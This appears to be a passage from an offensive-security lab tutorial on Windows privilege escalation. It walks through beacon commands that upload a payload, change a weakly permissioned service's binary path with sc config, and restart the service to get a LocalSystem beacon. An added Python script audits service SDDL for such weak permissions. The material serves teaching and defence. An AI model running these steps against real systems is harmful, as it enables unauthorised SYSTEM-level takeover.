However, it doesn't show exactly what the permissions are, so we need to dig a little deeper. This PowerShell script will print which service rights we have.
We can see that all Authenticated Users have ChangeConfig, Start and Stop privileges over this service. We can abuse these weak permissions by changing the binary path of the service - so instead of it running C:\Program Files\Vulnerable Services\Service 2.exe, we can have it run something like C:\Temp\payload.exe.
First - validate that the current path is "C:\Program Files\Vulnerable Services\Service 2.exe" (also note that the path is quoted).
Next, upload a service binary payload and reconfigure the binary path on the vulnerable service.
beacon> mkdir C:\Temp
beacon> cd C:\Temp
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> run sc config VulnService2 binPath= C:\Temp\tcp-local_x64.svc.exe
[SC] ChangeServiceConfig SUCCESS
The space after binPath= is intentional as this is how it's documented in sc's help documentation.
Validate that the path has indeed been updated.
beacon> run sc qc VulnService2
SERVICE_NAME: Vuln-Service-2
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Temp\tcp-local_x64.svc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VulnService2
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Because the service is currently running (as can be seen with sc query VulnService2), we must stop and then start the service to execute our malicious binary.
beacon> run sc stop VulnService2
beacon> run sc start VulnService2
beacon> connect localhost 4444
[+] established link to child beacon: 10.10.123.102
The additional set of escaped quotes is necessary to ensure that the path remains fully quoted, otherwise you could introduce a new unquoted service path vulnerability.
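A defender-side check for the weak permissions described above, as an added example (not code from the original page): it parses the SDDL string that `sc sdshow <service>` prints and reports allow ACEs in the DACL that give broad groups such as Authenticated Users the ChangeConfig right. The SDDL strings are constructed samples, and the `BROAD` trustee list and `DANGEROUS` rights set are assumptions to tune for your environment.

```python
import re

RIGHTS = {  # SDDL code -> (service right, access-mask bit)
    "CC": ("QueryConfig", 0x1), "DC": ("ChangeConfig", 0x2),
    "LC": ("QueryStatus", 0x4), "SW": ("EnumerateDependents", 0x8),
    "RP": ("Start", 0x10), "WP": ("Stop", 0x20), "SD": ("Delete", 0x10000),
    "DT": ("PauseContinue", 0x40), "LO": ("Interrogate", 0x80),
    "CR": ("UserDefinedControl", 0x100), "RC": ("ReadControl", 0x20000),
    "WD": ("WriteDac", 0x40000), "WO": ("WriteOwner", 0x80000),
    "GA": ("GenericAll", 0x10000000), "GW": ("GenericWrite", 0x40000000),
}
# Rights that let the holder decide what the service runs, directly or via the DACL.
DANGEROUS = {"ChangeConfig", "WriteDac", "WriteOwner", "GenericAll", "GenericWrite"}
# Broad, low-privileged trustees (SDDL SID aliases); an assumed list.
BROAD = {"AU": "Authenticated Users", "WD": "Everyone", "BU": "Builtin Users",
         "IU": "Interactive", "DU": "Domain Users"}

def decode_rights(field):
    """Decode an ACE rights field, given as two-letter codes or a hex mask."""
    if field.lower().startswith("0x"):
        return {n for n, bit in RIGHTS.values() if int(field, 16) & bit}
    codes = [field[i:i + 2] for i in range(0, len(field), 2)]
    return {RIGHTS[c][0] if c in RIGHTS else c for c in codes}

def audit(sddl):
    """Return (trustee, risky rights, can_restart) for each weak allow ACE."""
    # Only the DACL ("D:") grants access; "S:" audit ACEs must be skipped.
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", m.group(1) if m else ""):
        f = ace.split(";")
        if len(f) == 6 and f[0] == "A" and f[5] in BROAD:
            rights = decode_rights(f[2])
            risky = sorted(rights & DANGEROUS)
            if risky:
                findings.append((BROAD[f[5]], risky, {"Start", "Stop"} <= rights))
    return findings

# Constructed `sc sdshow` outputs; only the service name comes from the page.
SAMPLES = {
    "DefaultLikeService": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                          "(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "VulnService2": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                    "(A;;DCRPWP;;;AU)",
}

if __name__ == "__main__":
    for name, sddl in SAMPLES.items():
        print(name, audit(sddl) or "no broad trustee can reconfigure this service")
```

The first sample shows why the SACL has to be excluded: its audit ACE names Everyone (`WD`) alongside every right, which a parser that scanned the whole string would report as a finding.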